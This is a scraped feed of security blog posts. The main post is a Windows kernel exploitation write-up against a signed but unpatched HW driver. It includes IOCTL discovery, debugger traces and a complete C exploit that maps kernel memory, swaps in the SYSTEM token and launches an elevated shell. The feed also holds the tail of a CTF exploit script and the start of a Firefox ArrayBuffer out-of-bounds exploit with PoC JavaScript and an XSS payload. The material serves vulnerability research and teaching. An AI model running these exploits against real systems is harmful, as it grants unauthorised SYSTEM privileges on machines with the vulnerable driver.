buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

The post Ekoparty 2022 BFS Windows Challenge appeared first on Vulndev.

Windows Kernel Exploitation – Arbitrary Memory Mapping (x64)

By: xct
24 September 2022 at 11:09

In this post, we will develop an exploit for the HW driver. I picked this one because I was looking for a real-life target to practice on and saw a post by Avast that mentioned vulnerabilities in an old version of this driver (version 4.8.2 from 2015) that was used as part of a bigger exploit chain. Unfortunately, I could not find that version available for download, so I ended up using the most recent version, 4.9.8 at the time of writing this post. This driver is signed by Microsoft so we can load it even without a kernel debugger attached (the certificate has been expired since 2021 but that does not really prevent loading).

Advisory: https://ssd-disclosure.com/ssd-advisory-mts-hw-driver-escalation-of-privileges/

I started by trying to find the IOCTLs mentioned in the post but they do not exist anymore. Luckily the driver provides some other IOCTLs that looked relatively easy to exploit, so I gave it a shot.

Vulnerability Discovery

Before starting to look at the driver in IDA, I gave this excellent intro post by Voidsec another read to see what kind of starting points to look for:

  • MmMapIoSpace
  • rdmsr
  • wrmsr

At the end of the post, he mentions looking for MmMapIoSpace as an exercise which is something that we have in this driver as well. In the end, I ended up using a different function though.

After opening the driver in IDA, we look at the imports and can see a couple of functions that handle memory mappings:

Besides the already mentioned MmMapIoSpace there are a couple of other interesting functions here that we can potentially use, including MmMapLockedPages. Let’s see what both functions do:

PVOID MmMapIoSpace(
  [in] PHYSICAL_ADDRESS    PhysicalAddress,
  [in] SIZE_T              NumberOfBytes,
  [in] MEMORY_CACHING_TYPE CacheType
);

MmMapIoSpace allows mapping a physical memory address to a virtual (kernel-mode) address. This can be useful if you can control the arguments to the function, especially the first 2, through some IOCTL. In this driver, this is indeed the case with one of the IOCTLs, but the memory is never mapped to a user-mode address afterward or returned, so I could not do much with it besides crashing the system (by mapping an invalid address). If this address were mapped to a user-mode address and returned, it could be exploited. There is an excellent post here on how to do it. Let’s look at the other function for now:

PVOID MmMapLockedPages(
  [in] PMDL MemoryDescriptorList,
  [in] __drv_strictType(KPROCESSOR_MODE / enum _MODE,__drv_typeConst)KPROCESSOR_MODE AccessMode
);

This function (which is deprecated according to Microsoft) allows mapping a virtual address to another one and takes in a pointer to a Memory Descriptor List (MDL). Usually, a call to this function is preceded by the following calls:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,
  [in]                ULONG                  Length,
  [in]                BOOLEAN                SecondaryBuffer,
  [in]                BOOLEAN                ChargeQuota,
  [in, out, optional] PIRP                   Irp
);

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList
);

IoAllocateMdl takes a virtual memory address & length (we ignore the other arguments for now) and will result in an MDL that is large enough to map our requested buffer size (but not filled yet). The following MmBuildMdlForNonPagedPool will then update the structure with the information about the underlying physical pages that back the virtual memory we requested. Finally MmMapLockedPages takes this pointer to the MDL & returns another address in user-mode virtual memory where the physical pages described by the MDL have been mapped to.

This essentially means that if the 3 functions are executed in the order described, we create a second virtual address that maps to the same physical address as the initial virtual address.
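
To build intuition for what such an aliased mapping means, the following minimal sketch maps one backing page twice in user mode with Python's mmap module. It is only an analogy and does not touch the driver: the temporary file plays the role of the physical page, and the names first_view and second_view are made up for illustration.

```python
import mmap
import tempfile

# One backing file stands in for the physical page; the two mmap objects
# stand in for the two virtual addresses (an analogy only, not the driver).
with tempfile.TemporaryFile() as backing:
    backing.truncate(mmap.PAGESIZE)
    first_view = mmap.mmap(backing.fileno(), mmap.PAGESIZE)
    second_view = mmap.mmap(backing.fileno(), mmap.PAGESIZE)

    first_view[0:8] = b"AAAABBBB"      # write through the first mapping
    aliased = bytes(second_view[0:8])  # read the same bytes through the second
    print(aliased)

    first_view.close()
    second_view.close()
```

A write through one view is immediately visible through the other, which is the property the exploit relies on once the second view lives in user mode and the first one is a kernel address.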

With this theory out of the way, let’s see if and how we can reach this chain of functions. By following the references in IDA we can see that it’s used a few times throughout the program but only in 2 functions:

The path we are going to follow is sub_2E80 (also worth exploring the other one though). When we look at this function we first see a couple of checks being done on the arguments before it eventually ends up in the sequence of functions we just discussed:

For the checks inside the function, we will have a look in the debugger later since some of them might just not matter much to us (e.g. some might be automatically passed without any work from our side). For now, we focus on discovering how to reach this function in the first place. We look for references again and find quite a few:

All those refs are coming from the same function which is essentially a big switch/if/else construct for the different IOCTLs that this driver supports. Here we just go for the first one and follow the back-edges in IDA until we hit an IOCTL at 0x3F70:

cmp     [rsp+0D8h+var_24], 9C406500h
jz      loc_52D8

So with a potential IOCTL that can get close to the code path we want, we quickly check the driver start function which calls sub_1E80 and has the string we need in order to use CreateFile to get a handle to the driver.
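
As a side note, the control code itself can be split into its fields using the bit layout of the Windows CTL_CODE macro (device type in bits 31-16, access in bits 15-14, function in bits 13-2, method in bits 1-0). The sketch below does this for 0x9C406500; decode_ioctl and METHODS are hypothetical helper names introduced here, not something taken from the driver.

```python
# Transfer method names for the two low bits of a control code.
METHODS = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}


def decode_ioctl(code):
    """Split a 32-bit control code into the four CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,      # 1 = FILE_READ_ACCESS, 2 = FILE_WRITE_ACCESS
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


fields = decode_ioctl(0x9C406500)
print({name: hex(value) for name, value in fields.items()})
print(METHODS[fields["method"]])
```

With METHOD_BUFFERED the I/O manager copies the caller's input into a kernel buffer before the driver sees it, so the driver works on a copy rather than on the user-mode pointer directly.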

Now we can write our first template and debug the driver:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

int main() {
    DWORD index = 0;
    DWORD bytesWritten = 0;

    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
   
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434344444444; 
    *(in + index++) = 0x4545454546464646;              

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);

    return 0;
}

Before running the PoC, we set a breakpoint on the IOCTL comparison so we can follow the execution flow in the debugger:

0: kd> .reload
0: kd> lm m hw64
Browse full module list
start             end                 module name
fffff806`5c1a0000 fffff806`5c1aa000   hw64       (deferred)
0: kd> ba e1 hw64+0x3F70
0: kd> g
...
Breakpoint 0 hit
hw64+0x3f70:
fffff806`5c1a3f70 81bc24b40000000065409c cmp dword ptr [rsp+0B4h],9C406500h

Now that we hit the breakpoint, we continue to step through the code and inspect the source of every comparison to make sure that we track any dependencies on our input buffer. After a few instructions, we hit a call to our target function at hw64+0x532b:

1: kd> 
hw64+0x532b:
fffff806`5c1a532b e850dbffff      call    hw64+0x2e80 (fffff806`5c1a2e80)
1: kd> r
rax=000000009c406500 rbx=ffffbb08113f9540 rcx=ffffbb080fc63000
rdx=0000000000000000 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a532b rsp=ffffcb0d5189e700 rbp=ffffcb0d5189e881
 r8=ffffbb080e9c26c0  
1: kd> dq rcx
ffffbb08`0fc63000  41414141`42424242 43434343`44444444
ffffbb08`0fc63010  45454545`46464646 00000000`00000000
1: kd> t

We can see that this function takes our input buffer as the first argument – more precisely a copy of it since we can see that it’s at a kernel address. We step into the function and look for comparisons again.

1: kd> 
hw64+0x2ef0:
fffff806`5c1a2ef0 488b8424e0000000 mov     rax,qword ptr [rsp+0E0h]
1: kd> 
hw64+0x2ef8:
fffff806`5c1a2ef8 4883781000      cmp     qword ptr [rax+10h],0
1: kd> dq rax+10
ffffbb08`0fc63010  45454545`46464646 

Part of our input is compared to zero – if we trace the instructions in IDA we can see that in order to get to our vulnerable code block we need to not take the jump. So this is fine for now. In the next basic block the same comparison is done again and we also pass the check. This is repeated once more and we finally get to the block at hw64+0x2F60 that has the call to IoAllocateMdl.

1: kd> 
hw64+0x2f7f:
fffff806`5c1a2f7f ff155b410000    call    qword ptr [hw64+0x70e0 (fffff806`5c1a70e0)]
1: kd> r
rax=ffffbb080fc63000 rbx=ffffbb08113f9540 rcx=4545454546464646
rdx=0000000044444444 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a2f7f rsp=ffffcb0d5189e620 rbp=ffffcb0d5189e881
 r8=0000000000000000  r9=0000000000000000

Let’s match the arguments to the function signature:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,  // 4545454546464646
  [in]                ULONG                  Length,          // 0000000044444444 
  [in]                BOOLEAN                SecondaryBuffer, // 0
  [in]                BOOLEAN                ChargeQuota,     // 0
  [in, out, optional] PIRP                   Irp              // 0 (on stack)
);

We can see that we control the VirtualAddress it’s getting an MDL for and the size. The values we provided are obviously useless but they helped us to trace our user input. The function actually doesn’t complain and we can step over it (since it only allocates the memory for the MDL). If we step further we hit MmBuildMdlForNonPagedPool:

1: kd> 
hw64+0x2f97:
fffff806`5c1a2f97 ff153b410000    call    qword ptr [hw64+0x70d8 (fffff806`5c1a70d8)]
1: kd> r
rax=ffffbb080d010000 rbx=ffffbb08113f9540 rcx=ffffbb080d010000

Which maps to this call:

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList // ffffbb080d010000
);

This will now result in a BSOD since the size we requested is way too large and the address is bogus.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffa9a2a2a32320, memory referenced.

At this point, we know what our input buffer should look like to get an arbitrary memory mapping and we can continue with the exploitation section.
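
The layout that the trace suggests can be written down as a small sketch: three little-endian QWORDs, where the low 32 bits of the second one end up as Length (rdx held 0x44444444) and the third one ends up as VirtualAddress. build_input is a hypothetical helper, and treating the first QWORD and the upper half of the second as unused filler is an assumption based only on the values observed above.

```python
import struct


def build_input(addr, length, filler=0x4141414142424242):
    """Pack the three QWORDs observed in the trace (hypothetical helper)."""
    # Only the low dword of the second QWORD reached IoAllocateMdl as Length;
    # the upper dword is kept as the 0x43434343 marker used in the PoC.
    second = (0x43434343 << 32) | (length & 0xFFFFFFFF)
    return struct.pack("<QQQ", filler, second, addr)


buf = build_input(addr=0x4545454546464646, length=0x44444444)
q0, q1, q2 = struct.unpack("<QQQ", buf)
print(hex(q0), hex(q1), hex(q2))
```

For a real mapping the length would be something small such as one page (0x1000) and the address a valid kernel virtual address, which is what the exploitation section uses.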

Exploitation

After having discovered the vulnerable IOCTL it’s time to start the exploitation process. Assuming we can map any kernel virtual address into a user-mode address – what could a good target be? A commonly used payload for kernel exploits is token stealing shellcode. We do not really need shellcode for escalating privileges though because we can copy the token of a SYSTEM process to our current process using the mapping mechanism as a read/write primitive (data-only attack). Executing shellcode is also possible but not in scope for this post. The plan of attack is as follows:

  • Get the address of a SYSTEM process and read the Token pointer
  • Get the address of our current process and overwrite the Token pointer with the one from the SYSTEM process

We can use NtQuerySystemInformation to get the address of a SYSTEM process in memory without using any exploit. We are then going to use our mapping primitive to map the memory where the process is located to a user-mode address. This allows us to read the fields of the EPROCESS structure including the Token, UniqueProcessId and ActiveProcessLinks, of which we can get offsets via the debugger:

1: kd> dt _EPROCESS
ntdll!_EPROCESS
   ....
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   ...
   +0x4b8 Token            : _EX_FAST_REF
   ...
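
One detail matters when following ActiveProcessLinks: the Flink of a LIST_ENTRY points at the list entry inside the next EPROCESS, not at the start of that structure, so the field offset has to be subtracted again. The sketch below walks such a list over fake memory using the offsets from the dt output. All addresses, PIDs and token values are invented, and make_eprocess, read_qword and find_process are hypothetical names.

```python
import struct

PID_OFF, LINKS_OFF, TOKEN_OFF = 0x440, 0x448, 0x4B8  # offsets from the dt output


def make_eprocess(pid, token):
    """Build a zeroed fake EPROCESS blob with only PID and Token filled in."""
    blob = bytearray(0x4C0)
    struct.pack_into("<Q", blob, PID_OFF, pid)
    struct.pack_into("<Q", blob, TOKEN_OFF, token)
    return blob


# Fake "kernel memory": base address -> EPROCESS bytes (all values invented).
memory = {
    0x1000: make_eprocess(4, 0xAAAA0001),
    0x2000: make_eprocess(1234, 0xBBBB0002),
    0x3000: make_eprocess(5678, 0xCCCC0003),
}
bases = sorted(memory)
for cur, nxt in zip(bases, bases[1:] + bases[:1]):
    # Flink stores the address of the NEXT entry's ActiveProcessLinks field.
    struct.pack_into("<Q", memory[cur], LINKS_OFF, nxt + LINKS_OFF)


def read_qword(base, offset):
    return struct.unpack_from("<Q", memory[base], offset)[0]


def find_process(start_base, wanted_pid):
    """Follow Flink pointers until the PID matches or the list wraps around."""
    base = start_base
    while True:
        flink = read_qword(base, LINKS_OFF)
        base = flink - LINKS_OFF  # step back from the list entry to the struct base
        if read_qword(base, PID_OFF) == wanted_pid:
            return base
        if base == start_base:
            return None  # wrapped around without a match


found = find_process(0x1000, 5678)
print(hex(found), hex(read_qword(found, TOKEN_OFF)))
```

The wrap-around check is a choice made for this sketch so that the walk terminates when the PID is not in the list.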

We are updating the PoC to map the SYSTEM process and verify that the data at the mapped address and at the original virtual address is indeed the same:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }       

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    printf("System Process: %llx\n", systemProc);

    QWORD systemProcMap = mapArbMem(systemProc, hDriver);    
    printf("System Process Mapping: %llx\n", systemProcMap);

    getchar();
    DebugBreak();
    return 0;
}

The getchar() gives us the chance to copy the addresses out and the DebugBreak() conveniently breaks in the context of our process.

[>] Exploiting driver..
System Process: ffff850120cab040
System Process Mapping: 1ce40870040
...
1: kd> dq ffff850120cab040
ffff8501`20cab040  00000000`00000003 ffff8501`20cab048
ffff8501`20cab050  ffff8501`20cab048 ffff8501`20cab058
1: kd> dq 1ce40870040
000001ce`40870040  00000000`00000003 ffff8501`20cab048
000001ce`40870050  ffff8501`20cab048 ffff8501`20cab058

As expected, we got a mapping of the target address. We did not cover the output buffer yet – essentially if we inspect it after triggering the IOCTL with valid arguments we get something like the following back, which has the mapped user-mode address as the 3rd value:

 ffff850127c16970 4343434300001000 1ce40870040 00000000 ...
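
Comparing the two addresses from the run above also shows that the returned user-mode address keeps the offset within the page (0x040 in both cases). Under that observation, a field at a known offset from the kernel address can be reached at the same offset from the mapped address, as long as it stays inside the mapped length. The sketch below only does this arithmetic; translate is a hypothetical helper name.

```python
PAGE_SIZE = 0x1000

kernel_va = 0xFFFF850120CAB040  # "System Process" from the run above
mapped_va = 0x000001CE40870040  # "System Process Mapping" from the run above

# Both addresses share the same offset within their page.
kernel_off = kernel_va & (PAGE_SIZE - 1)
mapped_off = mapped_va & (PAGE_SIZE - 1)
print(hex(kernel_off), hex(mapped_off))


def translate(kernel_addr):
    """User-mode alias of a kernel address inside the mapped range (hypothetical helper)."""
    return mapped_va + (kernel_addr - kernel_va)


# Where the Token field (offset 0x4b8) of the mapped EPROCESS becomes readable.
token_alias = translate(kernel_va + 0x4B8)
print(hex(token_alias))
```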

At this point, all that is left to do is read the SYSTEM token and then iterate through the ActiveProcessLinks linked list until we find our own process. When we find it, we overwrite our own Token with the SYSTEM one and are done. The final exploit implementing this can be found below:

#include "windows.h"
#include <stdio.h>

// Author: @xct_de
// Target: Windows 11 (10.0.22000)

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    QWORD systemProcMap = mapArbMem(systemProc, hDriver);
    QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8));
    printf("[>] System Token: 0x%llx\n", systemToken);

    DWORD currentProcessPid = GetCurrentProcessId();
    BOOL found = false;
    QWORD cMapping = systemProcMap;
    DWORD cPid = 0;
    QWORD cTokenPtr = 0;
    while (!found) {
        QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448)); 
        cMapping = mapArbMem(readAt - 0x448, hDriver);
        cPid = (DWORD)(*(DWORD*)(cMapping + 0x440));
        cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8));
        if (cPid == currentProcessPid) {
            found = true;
            break;
        }
    }
    if (!found) {
        exit(-1);
    }
    printf("[>] Stealing Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = systemToken;
    system("cmd");
    printf("[>] Restoring Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = cTokenPtr;
    return 0;
}

SYSTEM \o/

I reported the vulnerability to SSD which then contacted the vendor. Unfortunately, the vendor never responded.

The post Windows Kernel Exploitation – Arbitrary Memory Mapping (x64) appeared first on Vulndev.

Browser Exploitation: Firefox OOB to RCE

By: xct
9 September 2022 at 11:19

Intro

In this post, we will exploit Midenios, a good introductory browser exploitation challenge that was originally used for the HackTheBox Business-CTF. I had some experience exploiting IE/Edge/Chrome before, but exploiting Firefox was mostly new to me. I solved this challenge way after the CTF so I had some existing writeups to fall back on. There were a lot of excellent resources that helped with developing the exploit, here are some of them:

Definitely check out the write-up by 0xten because it follows a different exploitation path after obtaining the read/write primitive. Since it’s been a long time since I did anything with Firefox, there might be some inaccuracies. If you find something, please let me know, I want to learn more :)

Vulnerability

The challenge itself has a website that allows you to submit unsanitized HTML input which is later visited by a bot. We can submit script tags to achieve a “persistent” XSS: <script src="http://127.0.0.1/exploit.js"></script>. The bot is using a vulnerable, custom-patched version of Firefox to visit the page and is executing the user-provided JavaScript.

Besides the website, we are provided an archive that contains a “patch.diff” which shows the changes made to the code base, and a “mozconfig” that shows that debug mode is enabled.

mozconfig

ac_add_options --enable-debug

patch.diff (shortened and commented, all changes to js/src/vm/ArrayBufferObject.cpp and js/src/vm/ArrayBufferObject.h):

# added a setter for byteLength 
-    JS_PSG("byteLength", ArrayBufferObject::byteLengthGetter, 0),
+    JS_PSGS("byteLength", ArrayBufferObject::byteLengthGetter, ArrayBufferObject::byteLengthSetter, 0),


# added implementation for the byteLength setter
+MOZ_ALWAYS_INLINE bool ArrayBufferObject::byteLengthSetterImpl(
+    JSContext* cx, const CallArgs& args) {
+  MOZ_ASSERT(IsArrayBuffer(args.thisv()));
+
+  // Steps 1-2
+  auto* buffer = &args.thisv().toObject().as<ArrayBufferObject>();
+  if (buffer->isDetached()) {
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 3
+  double targetLength;
+  if (!ToInteger(cx, args.get(0), &targetLength)) {
+    return false;
+  }
+
+  if (buffer->isDetached()) { // Could have been detached during argument processing
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 4
+  buffer->setByteLength(targetLength);
+
+  args.rval().setUndefined();
+  return true;
+}


# removed length sanity check
void ArrayBufferObject::setByteLength(size_t length) {
-  MOZ_ASSERT(length <= maxBufferByteLength());
+//  MOZ_ASSERT(length <= maxBufferByteLength());
   setFixedSlot(BYTE_LENGTH_SLOT, PrivateValue(length));
}

We can see that a new setter was added that allows setting byteLength on an ArrayBuffer, and that the check that verified the length does not exceed maxBufferByteLength was removed. Without reading everything in the patch diff, we can already assume that we will have to create an ArrayBuffer object and then set its byteLength to a large value to achieve out-of-bounds memory access when accessing the contents of the ArrayBuffer.

Before trying to verify our assumption we have to create a debug environment to develop the exploit.

Preparing the debug environment

To quickly test our exploit without having to start Firefox itself, we can compile its JavaScript engine, SpiderMonkey, locally. We will do that both in debug and in release mode (the reason for both will become clear later):

rustup update
hg clone http://hg.mozilla.org/mozilla-central spidermonkey
cd spidermonkey

spidermonkey patch -p1 < ../pwn_midenios/src/diff.patch
patching file js/src/vm/ArrayBufferObject.cpp
Hunk #1 succeeded at 325 (offset -11 lines).
Hunk #2 succeeded at 366 (offset -11 lines).
Hunk #3 succeeded at 1031 (offset -7 lines).
patching file js/src/vm/ArrayBufferObject.h
Hunk #1 succeeded at 167 (offset 1 line).
Hunk #2 succeeded at 339 (offset 1 line).

cd spidermonkey/js/src
mkdir build_DBG.OBJ
cd build_DBG.OBJ
../configure --enable-debug --disable-optimize
make -j8

cd ..
mkdir build.OBJ
cd build.OBJ
../configure --disable-debug --disable-optimize
make -j8

After compiling both versions, we can find the js executable in both build directories in dist/bin/. For debugging I will use gdb with https://hugsy.github.io/gef/. Now that we have our environment set up, we can write a simple PoC that does an out-of-bounds read.

We define an ArrayBuffer “A” and use the new byteLength setter to put a large value there. We then create another ArrayBuffer “B” just to have an adjacent object in memory (it will be placed exactly next to the first one). Then we create a TypedArray (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray) from our ArrayBuffer. This is done so we can access the contents of the underlying binary buffer as an array.

Finally, we try to dump the contents of “A” which is only defined up to the 10th iteration (we set the size to 80 – so 10 8-byte values). However, due to our manipulated byte length, we can now print beyond that boundary and dump the memory of the adjacent object “B”.

Poc_0x01.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n


// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBuf = new BigUint64Array(bBuf)
bBuf[0] = 0x4242424242424242n

// access A as a TypedArray out of bounds to read some metadata/data of B
for(let i=0;i<20;i++){
    console.log(`${i} ${aBuf[i].toString(16)}`)
}

Running the PoC shows that we can indeed access beyond the size of the ArrayBuffer and see memory that does not belong to it:

spidermonkey/js/src/build_DBG.OBJ/dist/bin/js -i pwn_0x01.js
0 4141414141414141
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 fffe4d4d4d4d4d4d
11 fffe4d4d4d4d4d4d
12 58dcd466700
13 5618d8518088
14 5618d8517828
15 58dcd46a160
16 50
17 fffe3ee4bd6007e0
18 fff8800000000000
19 4242424242424242

Obtaining a read/write primitive

So what are these values? Let’s have a look in gdb at “A” first (which is a TypedArray):

gdb -p $(pidof js)

gef➤  grep 0x4141414141414141
[+] Searching '\x41\x41\x41\x41\x41\x41\x41\x41' in memory
[+] In (0x58dcd400000-0x58dcd500000), permission=rw-
  0x58dcd469038 - 0x58dcd469040  →   "AAAAAAAA"
  0x58dcd46a0c8 - 0x58dcd46a0d0  →   "AAAAAAAA"
[+] In (0x3ee4bd600000-0x3ee4bd700000), permission=rw-
  0x3ee4bd600848 - 0x3ee4bd600868  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7f4343996000-0x7f43439ee000), permission=r--
  0x7f43439bc440 - 0x7f43439bc460  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc448 - 0x7f43439bc468  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc450 - 0x7f43439bc470  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc458 - 0x7f43439bc478  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"


gef➤  x/40xg 0x58dcd46a0c8-0x40
0x58dcd46a088:    0x0000000000000000                  0x0000058dcd466700 (*shape)
0x58dcd46a098:    0x00005618d8518088 (*slots)         0x00005618d8517828 (*elementsHdr)
0x58dcd46a0a8:    0x0000058dcd46a0c8 (*elementsData)  0x00000000000003e8 (byteLength)
